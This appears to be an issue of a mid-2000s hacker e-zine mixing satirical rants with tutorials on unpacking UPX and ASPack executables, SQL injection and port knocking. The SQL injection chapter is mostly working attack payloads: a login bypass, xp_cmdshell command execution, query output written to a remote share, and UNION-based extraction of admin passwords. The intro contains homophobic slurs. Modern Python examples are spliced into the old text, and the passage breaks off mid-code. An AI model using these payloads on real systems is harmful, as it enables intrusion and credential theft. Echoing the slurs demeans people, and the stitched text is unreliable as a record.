L'elephants avec les trunks huge 01
l'elephants avec les trunks huge
izzue un
___ ___
/ \____/ \
/ / __ \ \
/ | .. | \
\___/| |\___/\
| |_| |_| \
| |/|__|\| \
| |__| |\
| |__| |_/ / \
| @ | | @ || @ | '
| |~~| || | -The jelqing elephant-
'ooo' 'ooo''ooo'
"don't make fun of the circus animals!"
* death to capitalism * feed the socialists * bush is evil *
* let's all do drugs * working is for capitalists *
* les francais toujours! *
--------------------------------------------
# Un - l'Introduction
Bonjour et valkomen to izzue un of 'l'elephants avec les trunks huge'.
Before we commence, some shout outs are in order:
SHOUT OUTZ: #b4b0, chrak (for the drugz), #phrack, #2600, tymat.
\ /
31337
Et maintenant pour les zine..... what can we say for intro? Dunno...
how about DOWN WITH CAPITALISM! IF YOU VOTED FOR BUSH YER ST00pID or
something. FRANCE IS NUMBER UN! EVERYONE DO DRUGS AND NOBODY WORK
AND LET'S ALL BE FAGS AND DO WHATEVER WE WANT WITH NO RESTRAINT! IT IS
THE ONLY LOGICAL WAY!!! MORALS == ARBITRATION! ANARCHHYYYYYYYYY
ANARCHYYYYYY FOREVERRRRRRRRRRRRRRRRR WE ARE EDUCATED YEW ARE NOT HAHA!
Also please drive hydrogen powered cars and wear beads and smoke pot
and denounce anything that becomes even mildly popular. Remember, YOU
are ENLIGHTENED!!! You may not be able to explain exactly why you hate
structure and order and things that have been proven by time, but WHO
CARES?!?!?!?! WE ARE IN THE 21st CENTURY AND ARE BETTER THAN THE CAVE
MEN THAT EXISTED ON EARTH 100 YEARS AGO. SO YOOOOOOOOOO0000000000000.
IF YOU DO DRUGS ITZ OK CAUSE SOCIETY WILL PAY TO PUT YOU IN THE HOSPITAL!
WERDDDDDDDD TO SOCIALISM! YAY CANADA!
Idiots. Read on you fucking socialist leaches. FREE KEVIN!
We worked hard to bring you this zine! Thanks to contributors!
No matter what contributors or b4b0 or anyone else may say, this is
100% grade-A original! They are just jealous capitalists who probably
carry guns *shiver*.
As you will no doubt notice, there's nothing particularly substantive
in here. Mainly dribble copied and modified slightly from computer
books and online texts. BUT WHO CAREZZZZZZ?!?!?!?! We're here for PROPS
and THATZ IT!!@#$
brought to you by: l'elephants and so forth
memberz: wouldn't you like to know?
...and a generous grant from the Karl Marx Foundation
"Every time I see a gun I piss my pants" -- our founder
*****************************************************************************
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
*****************************************************************************
WORLD NEWS:
"...The ascii icons foundation wishes to welcome its newborn member,
totally fag-free, worksafe ATI© icon.
ATI©, or the ASCII Thinking Icon which is represented by these three
caracers consecutively:
: double-point (<-- french)
D open mouth that adds the twist of fun to the mix
? the innovative hand-scratching-chin imitation of real life deep thinking
situations posture..."
:D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D?
The ascii thinking icon " :D? " © is published
under the GNU public Lisence.
and could be distributed, used, published
and implemented in your IRC chatting lexic according to the GPL.
examples on how to implement this 0day tech/art module in your IRC chatting:
example #1
<ttransien> h0h0
<ttransien> hm should i take a piss
<ttransien> :D?
example #2
<w01f> this code you just sent me doesnt compile well
<w01f> I think it needs reviewing
<w01f> :D?
Have fun with it!
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'lelephants BRINGING DIRECTION TO YOU
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
.[ #b4b0 @ efnet re-opened for public and gay as ever ].
WERD TO LES ANIMAUX!!@#$
.-------->[FREEWAY OPEN:B4B0]<----------.
| ROAD CONDITIONS |
V $
[*] 59 North CAUSION: Hevy Dope Fog |
+ ph1x $
[x] E18 East OPEN: CAUSION SWERVED |
+ rdxz $\
[u] 99 North OPEN: Slight Winds | \
+ crypt1 $ \
[o] 10 West OPEN: Delivering Your Milk |______\________
+ MiLk-MaN $_______________|
[+] 91 South CLOSED: Banging Your Mom | / | |
+ tsai $ / | |
[z] | / | _|_____________________________
+ $ / | |
[%] Route 20 East CAUSION: ROAD WORK | | | rdxz moms house: 3,334 miles
+ cervix $ | | ph1x drug lab: 1.45 miles
[i] 49 North Closed: Flooding | | | San Fransisco: 534 miles
+ polder $ | | m4tts house: 535 miles
[+] 50 West Closed: Rock Slide | | | House of Kung Foo: -20 miles
+ lusta $ | | h00kahs Canadian House
[%] 1 South Open: Mexico Bound | | | Of Bacon: Not Far enough
+ p4bell $ | | gH Jail Cell: 734 miles
V | | |
| | | |______________________________|
`------->[ We Be Grubbin !!! ]<--------' | | || ||
| | || ||
| | || ||
| | || ||
.......[ issue # 011 7/05].....................................|___|........||.............||
[I]=[0x00] INTRO .x.[chrak].x. [*]
:S: :*:
[S]=[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. [B]
:U: :4:
[E]=[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x. [B]
:*: :0:
[#]=[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x. [H]
:0: :E:
[1]=[0x04] Re-Designed Port Knocking Security .x.[crypt1].x. [H]
:1: :B:
[*]=[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x [4]
:*: :B:
[*]=[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x [0]
: : :*:
[*]=[0x07] How to build a leet recording spy kit .x[wolfinux].x [4]
: : :L:
[*]=[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x [I]
: : :F:
[*]=[0x09] Making the Perfect Summertime Lemonade .x[t.Transient] [E]
: : :*:
[*]=[0x0A] EMPTY SPACE HERE [*]
:.:......................................................................................'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x00] INTRO .x.[chrak].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
OFFICIAL b4b0 drink: summertime lemonade
PEICE ABOUT b4b0 10 BEING MORE SHITTY THEN THIS AND BEING SKIPPED TO 11
WELL WELL WELL THIS IS WHERE THE INTRO IS GOING.
yes we are having http://www.chrakworld.com pimped in this issue.
.
.
.
.
.
.
.
.
[lelephant note: .... what?]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[Another fine article brought to yuo by b4b0!!!!1!! -ed]
Welcome people, is about Big Money Bullshit. I don't know about everyone else,
but i can tell you, that it pisses me the fuck off,every time i see one of thoughs<sic>
"Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies
like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit
self checkout systems. Now its bad enough that these companies move into every town
and take out mom&pop shops where, they buy things in bulk and sell them for a discount
. But to take away jobs, i feel this should be a human right concern. I can understand
Teknology but where do you draw the line. Most places use 4 - 8 self serving registers
which are monitored by 1 real person. That means 3-7 jobs are taken away from one store
at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store.
Now if u want to get realy teknical lets look at how many of these stores there are.
Im gong<sic> to just give a uneducated guess. For the sake of argument lets say theres
1,000 Walmarts, (everyone knows theres more). now thats 14,000 jobs they just elminated.
Lets do some math. now 14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000
week.. ect. Now thats alot of money you say. I say thats pocket change for the amount of
jobs that are being taken away for such a simple idea. Thats just greed, they already
have a huge margin of business, why do they need to take jobs away from us. What i would
like to know when its enough?, or whats next?
Are we going to be going to school though our computers or Tv's? Dam, waitthat shits
already im<sic> progress.... How lazy are we becomming? I hope someone is as pissed
off about this shit as i am.
I hope im not the only one that this shit bothers. I mean think about it, these
companys<sic> are just having us shop in a warehouse, checking our self out , just
having someone make sure we arent stealing and thats it. Anyways I'm done bitching, i
just think this shit is FUCKED UP.
.
.
.
.
.
.
.
.
[lelephant note: How profound.]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Software used: UPX 1.24, OllyDbg , OllyDump, Imprec
I have seen lots of tuts for UPX and they make things quite crazy/complex, so I
made this little tut just to show/teach you all how simple it is and allow any
kid to do it :P Ok, so here goes.
The start of any UPX-packed executable will look like this in OllyDbg:
(PACKER ENTRY POINT) - PEP
60 pushad
BEAEB04000 mov esi,xxxxxxx
8DBE525FFFFF lea edi,[esi+xxxx]
57 push edi
83CDFF or ebp,-001
EB10 jmp xxxxxx ;Unpacking Loop (useless to follow)
In all other tuts I have seen, the authors make you follow this jmp and follow
the instructions to find the OEP. I know it's a useful idea to teach you about
other packers, but hell, we just want to unpack UPX, don't we :P So scroll down
a bit and you will see something like the following:
(UNPACK INSTRUCTIONS)
FF96 D0AE0100 CALL DWORD PTR DS:[ESI+1AED0]
61 popad ;Restore Registers
E90826FFFF jmp xxxxx ;(OEP) Of The Unpacked Program
Go to the line with the POPAD and put a breakpoint using F2. Then press F7 one
time and you will land on the JMP XXXX instruction; this is our OEP, so remember
this. Now press F7 one more time and it will land you in the REAL UNPACKED code.
Wow, that was hard, wasn't it? OK, now click plugins->ollydump->Dump Debugged
Process. Leave all the options alone and note the Entry Point value, which is
next to the (GET EIP as OEP) button. OK, now we have an unpacked exe file which
does not run. So what's your first guess at what we need to fix? IMPORT TABLES,
correct, you're a genius now. So let's fire up Imprec and fire up the orig packed
program and attach to the orig process. Remember that address I told you to
note? OK, type it into the (OEP) box; do not worry about adding in the zeros, it
will do it for you. Mine was (6AE0), so I enter it in. Now click IAT auto search
and wait a second. Now click (Get Imports). Click show invalid, and if you see
any that say ( VALID:NO ), press the (Auto Trace) button and wait. Now click
(Fix Dump) and select the unpacked file you saved. VOILA, we are done and the
program is now unpacked and running. You may want to remove the UPX0 tags in
the headings, but I won't get into that here.
NOTES: sorry to all you unpacker gods, for not making this super complex for
all the newbs :P
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Software used: ASPACK (any version), OllyDbg , OllyDump, Imprec
I have seen lots of tuts for ASPACK and they make things quite crazy/complex, so
I made this little tut just to show/teach you all how simple it is and allow any
kid to do it :P Ok, so here goes.
The start of any ASPACK-packed executable will look like this in OllyDbg:
(PACKER ENTRY POINT) - PEP
01013001 > 60 PUSHAD
01013002 E8 03000000 CALL NOTEPAD.0101300A
01013007 -E9 EB045D45 JMP 465E34F7
0101300C 55 PUSH EBP
0101300D C3 RETN
In all other tuts I have seen, the authors make you follow this call and follow
the instructions to find the OEP. I know it's a useful idea to teach you about
other packers, but hell, we just want to unpack ASPACK, don't we :P So scroll
down a bit and you will see something like the following:
010133AF 61 POPAD <-- break point
010133B0 75 08 JNZ SHORT NOTEPAD.010133BA <--- F7
010133B2 B8 01000000 MOV EAX,1
010133B7 C2 0C00 RETN 0C
010133BA 68 E06A0001 PUSH NOTEPAD.01006AE0 <-- will land here and press F7
010133BF C3 RETN <--- F7
*hint* in olly you can press CTRL-B and type in 61 75 in the HEX +02 box and it
will find this for you. How cool for olly ;)
OK, so set a breakpoint on the POPAD and press F9 to run the program, and it
should break on this spot. Then F7 till you hit the PUSH, and then F7 into the
RET, and then dump.
01006AE0 6A DB 6A ; CHAR 'j'
01006AE1 70 DB 70 ; CHAR 'p'
01006AE2 68 DB 68 ; CHAR 'h'
01006AE3 88 DB 88
01006AE4 18 DB 18
It will look something like this, all messed up. You can press CTRL-A to analyse
the code to see what it looks like.
After you do the dump you will need to fix it with Imprec. I will not cover this
process here. I may write a howto for Imprec someday.
NOTES: sorry to all you unpacker gods, for not making this super complex for
all the newbs :P
MORE TUTS COMING SOON
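For analysts who want to check the OEP arithmetic from both tutorials outside the debugger, here is an added example (not dvdman's code) that decodes the two stub tails from the byte listings above. The UPX load address is constructed for the example, since the tutorial shows no addresses for that listing; the function and constant names are hypothetical.

```python
import struct

# Opcode bytes that appear in the two listings above.
POPAD, JMP_REL32, JNZ_REL8, PUSH_IMM32, RETN = 0x61, 0xE9, 0x75, 0x68, 0xC3


def upx_tail_jump_target(code: bytes, base_va: int):
    """UPX stub tail: POPAD followed by JMP rel32. Return the jump target VA."""
    pos = code.find(bytes([POPAD, JMP_REL32]))
    if pos == -1 or pos + 6 > len(code):
        return None
    rel32 = struct.unpack_from("<i", code, pos + 2)[0]   # signed displacement
    next_insn_va = base_va + pos + 6                     # 1 byte POPAD + 5 byte JMP
    return (next_insn_va + rel32) & 0xFFFFFFFF


def aspack_push_ret_target(code: bytes):
    """ASPack stub tail: POPAD, JNZ rel8 landing on PUSH imm32 / RETN.

    Returns the pushed address (the value RETN transfers control to).
    """
    pattern = bytes([POPAD, JNZ_REL8])
    pos = code.find(pattern)
    while pos != -1:
        if pos + 3 <= len(code):
            rel8 = struct.unpack_from("<b", code, pos + 2)[0]
            push = pos + 3 + rel8                        # offset the JNZ lands on
            if (0 <= push and push + 6 <= len(code)
                    and code[push] == PUSH_IMM32 and code[push + 5] == RETN):
                target = struct.unpack_from("<I", code, push + 1)[0]
                if target:                               # zero operand: treat as unresolved
                    return target
        pos = code.find(pattern, pos + 1)                # byte pairs can match by chance
    return None


# Bytes copied from the UPX listing: CALL [ESI+1AED0], POPAD, JMP rel32.
UPX_TAIL = bytes.fromhex("FF96D0AE0100" "61" "E90826FFFF")
UPX_TAIL_VA = 0x010144CC   # constructed load address, not from the tutorial

# Bytes copied from the ASPack listing at 010133AF..010133BF.
ASPACK_TAIL = bytes.fromhex("61" "7508" "B801000000" "C20C00" "68E06A0001" "C3")

if __name__ == "__main__":
    print(hex(upx_tail_jump_target(UPX_TAIL, UPX_TAIL_VA)))
    print(hex(aspack_push_ret_target(ASPACK_TAIL)))
```

A two-byte pattern is a weak signature, so a hit is only a candidate to confirm in the debugger.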
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#b4b0 - diesl0w [05/19/04]
--
TABLE OF CONTENTS
Chapter 1 - Introduction
Chapter 2 - What To Look For?
Chapter 3 - Vulnerability Testing
Chapter 4 - Get Remote Execution
Chapter 5 - OUTPUT via SQL Query
Chapter 6 - Updating/Inserting Data into the database
Chapter 7 - Protecting against SQL Injection
Chapter 8 - Other Places To Visit
Chapter 9 - Shout Outs
Summary:
The following article gets your foot in the door with basic SQL Injection techniques. It attempts to help you understand the methods used to prevent injection attempts, and to help beginners grasp the problems facing them both when trying to utilize SQL Injection techniques and when protecting themselves from such attacks.
--
Chapter 1 - Introduction
When a machine has only port 80 open, your most trusted vulnerability scanner won't return anything useful, and you know that the admin always patches his server, we have to turn to finding vulnerabilities in their web server. SQL injection is one type of web server intrusion that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (like ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.
This article does not introduce anything new; SQL injection has been widely written about and used in the wild. The article was written basically because we would like to document some of the techniques used during SQL injection, and we hope that it may be of some use to others. You may find a trick or two, but please check out Chapter 8, "Other Places To Visit", for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
--
Chapter 2 What To Look For?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be exploitable.
--
Chapter 3 Vulnerability Testing
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://exploitable.host.com/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it on your hard disk, and modify the URL and hidden field accordingly. Example:
<FORM action= http://exploitable.host.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
--
Chapter 4 Get Remote Execution
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
--
Chapter 5 OUTPUT via SQL Query
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must have the folder "share" shared for Everyone.
5.1 Grabbing Data
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "diesl0w" from the database:
http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='diesl0w'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'temp123' to a column of data type int.
/index.asp, line 5
We can now login as "diesl0w" with his password "temp123".
--
Chapter 6 Updating/Inserting Data into the database
When we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'temp123' WHERE login_name='diesl0w'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "diesl0w" with the password of "temp123".
--
Chapter 7 Protecting against SQL Injection
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For a numeric value, convert it to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.
Delete stored procedures that you are not using, like:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
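The numeric-value rule above, together with bound parameters for string input, shown as an added example (not from the original article). It goes one step beyond the chapter's character filter by keeping input out of the SQL text altogether. SQLite stands in for MS SQL Server, the rows are constructed around the article's admin_login table, and the function names are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the article's admin_login table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin_login "
               "(login_id INTEGER, login_name TEXT, password TEXT)")
    db.executemany("INSERT INTO admin_login VALUES (?, ?, ?)",
                   [(1, "neo", "constructed-pw"), (2, "diesl0w", "temp123")])
    return db


def login_concat(db, name, password):
    """BEFORE: input is pasted into the SQL text, so a quote ends the literal."""
    sql = ("SELECT login_name FROM admin_login "
           f"WHERE login_name = '{name}' AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_bound(db, name, password):
    """AFTER: values travel as bound parameters and are never parsed as SQL."""
    sql = ("SELECT login_name FROM admin_login "
           "WHERE login_name = ? AND password = ?")
    return db.execute(sql, (name, password)).fetchone() is not None


def lookup_by_id(db, raw_id):
    """Numeric parameter: accept ASCII digits only, convert, then bind."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None                      # anything but a plain integer is rejected
    row = db.execute("SELECT login_name FROM admin_login WHERE login_id = ?",
                     (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = "hi' or 1=1--"               # the test string from Chapter 3
    print("concatenated query accepts probe:", login_concat(db, probe, "x"))
    print("bound query accepts probe:       ", login_bound(db, probe, probe))
    print("id '2' ->", lookup_by_id(db, "2"))
    print("id with UNION ->",
          lookup_by_id(db, "10 UNION SELECT TOP 1 login_name FROM admin_login--"))
```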
--
Chapter 8 - Other Places To Visit
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL servers:
http://www.owasp.org/asac/input_validation/sql.shtml
SensePost's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
--
Chapter 9 - Shout Outs
Just want to give a shout-out to the following:
All old school gH members, might have split and went separate ways, but not forgotten..
#cha0s @ Unet, #innuendo @ Unet, #LinuxHQ @ Unet/EFnet, #coders @ EFnet, #b4b0 @ EFnet, #sketchy @ EFnet, #hurricane @ EFnet
zeb0r, exempt, clops, icbm, mosthated, mindphasr, REWN, and my people helping out on EFX Inc.
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x04] Re-Designed Port Knocking Security .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Hello everyone, I'm crypt1, I'll be your guide through this article.
Basically I'm going to be expressing some old ideas, some recent ideas, and kind of
give a few new ideas.
Let's start out on some old ideas. Now I'm assuming everyone reading this will
have a basic understanding of port knocking / OS fingerprinting.
But before you run off, just take a little trip with me :>. I was sitting
back for a few days playing with O/S detection and the concept of Port Knocking.
I figured that port knocking is a good idea, but needs improvements. Well, I kind
of came up with a new design or a way of doing port knocking.
As some of u might know, Port Knocking is usually set up on a system to open
closed services to privileged (private) users. The way most people set up port
knocking is they have a firewall with a set of ports, if not all ports, firewalled; then
they have a perl script tailing the log file of the connect()s tried. Well, when
a sequence, let's say ours is ports 6 24 18 10 78 441 5 1, when those ports are tried/
scanned in x amount of time, our perl script would then tell the firewall to allow
this IP address access to a certain port. Well, that's just fine and dandy. There is
some security in that, which is just one layer of security. But here's where we
start to add to the idea.
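The first layer described above (a script watching the firewall log for the sequence 6 24 18 10 78 441 5 1 inside a time limit), as an added example that is not crypt1's code. The log format is an assumption modelled on iptables LOG fields with an epoch-seconds prefix, the 10 second window stands in for "x amount of time", and the sample lines and names are constructed.

```python
import re

KNOCK_SEQUENCE = (6, 24, 18, 10, 78, 441, 5, 1)   # the sequence used in the article
WINDOW_SECONDS = 10                                # "x amount of time": assumed value

# Assumed log format: epoch seconds, then SRC= and DPT= fields somewhere on the line.
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s.*?\bSRC=(?P<src>\S+).*?\bDPT=(?P<dpt>\d+)")


class KnockTracker:
    """Per-source progress through the knock sequence."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
        self.sequence = tuple(sequence)
        self.window = window
        self.progress = {}              # src -> (next index, time of first knock)

    def observe(self, ts, src, port):
        """Feed one logged attempt; True when src completes the sequence in time."""
        idx, started = self.progress.pop(src, (0, ts))
        if idx and ts - started > self.window:
            idx, started = 0, ts        # too slow: forget partial progress
        if port != self.sequence[idx]:
            idx, started = 0, ts        # wrong port: restart
            if port != self.sequence[0]:
                return False            # and it is not a new first knock either
        idx += 1
        if idx == len(self.sequence):
            return True                 # caller opens the service for src only
        self.progress[src] = (idx, started)
        return False


def authorized_sources(lines, tracker=None):
    """Return the sources that completed the sequence, in order of completion.

    The decision rests only on source address and port order, so anyone who
    captured the knocks can repeat them; that is the gap the article's
    additional layers are meant to close.
    """
    tracker = tracker or KnockTracker()
    opened = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                    # not a firewall record
        if tracker.observe(float(m["ts"]), m["src"], int(m["dpt"])):
            opened.append(m["src"])
    return opened


def sample_line(ts, src, port):
    """Build one constructed log line in the assumed format."""
    return f"{ts} KNOCK SRC={src} DST=192.0.2.1 PROTO=TCP DPT={port}"


# Constructed sample: a correct knock, a sorted port scan, and a knock that is too slow.
SAMPLE_LOG = sorted(
    [sample_line(1000 + i, "192.0.2.10", p) for i, p in enumerate(KNOCK_SEQUENCE)]
    + [sample_line(1000 + i, "198.51.100.7", p)
       for i, p in enumerate(sorted(KNOCK_SEQUENCE))]
    + [sample_line(2000 + 5 * i, "203.0.113.5", p)
       for i, p in enumerate(KNOCK_SEQUENCE)],
    key=lambda line: float(line.split()[0]))

if __name__ == "__main__":
    print(authorized_sources(SAMPLE_LOG))
```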
What if we were to create a private reply seq:
NMAP PRINT OUT:
(NORMAL SYSTEM READOUT)
(FAKE SYSTEM ID:x.b4b0.corenetwork.co.va.rz.moon.crazy)
TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI=<VE%IPID=I%TS=P)
T1(DF=N%W=B680%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
# FROM nmap-os-fingerprints FILE!
# TEST DESCRIPTION:
# Tseq is the TCP sequenceability test
# T1 is a SYN packet with a bunch of TCP options to open port
# T2 is a NULL packet w/options to open port
# T3 is a SYN|FIN|URG|PSH packet w/options to open port
# T4 is an ACK to open port w/options
# T5 is a SYN to closed port w/options
# T6 is an ACK to closed port w/options
# T7 is a FIN|PSH|URG to a closed port w/options
# PU is a UDP packet to a closed port
(MODIFIED KERNEL TSEQENCING)
(NEW FAKE SYSTEM ID: x.b4b0.corenetwork.co.va.rz.moon.crazy)
TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI=<VE%IPID=I%TS=U)
T1(DF=N%W=R6883%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
to O/S Detection and
and the Perl script run it against the client , which would then tell the server
if this host is truly the private client or just some hacker trying to gain access
to the server.
Granted, we used more ports for our first layer, but they can be sniffed.
But then u ask yourself, ok well, so can the reply of the O/S detection, right? Right.
So how do we then determine if the host is the trusted host? Well, I'm getting to that.
On top of the new O/S detection function we have just added, let's add an
authentication algorithm, but let's base it off of something cool
(NOTE: this is just a suggestion).
Let's do a 2 time stamp PING TO Client -> Server, PING TO Server -> Client:
Server:
64 bytes from priv.serv (0.0.0.0): icmp_seq=1 ttl=49 time=33.0 ms
64 bytes from priv.serv (0.0.0.0): icmp_seq=2 ttl=49 time=31.5 ms
(NOTE: Let's average out the time with 2 requests: 32.25 )
(USAGE: We will send the 32.25 value to the client via Stunnel, which will be the client's key for its algorithm)
CLIENT:
64 bytes from priv.client (0.0.0.0): icmp_seq=1 ttl=49 time=32.7 ms
64 bytes from priv.client (0.0.0.0): icmp_seq=2 ttl=49 time=30.6 ms
(NOTE: Let's average out the time with 2 requests: 31.65 )
(USAGE: Key assigned by Server: 32.25 (Client: MSG: 31.65))
We can then note that the ping values won't be too far apart
(we could even go more into this but I won't now),
which would set our values for our preset algorithm :).
Once authenticated through that, you could then set up a USER/PASSWD port for
another method of security using an SSL-type connection. It just depends how
sensitive you want to be with your network :).
Now let's kind of lay this all out on how to make something like this:
Client Script: (NOTE: U WILL WANT TO USE A REAL SCRIPTING LANGUAGE! HEH)
value = run(./authenticate)                               // RUN AUTHENTICATION SCRIPT
if (value == 1) { program failed }                        // GET VALUE OF AUTHENTICATION SCRIPT
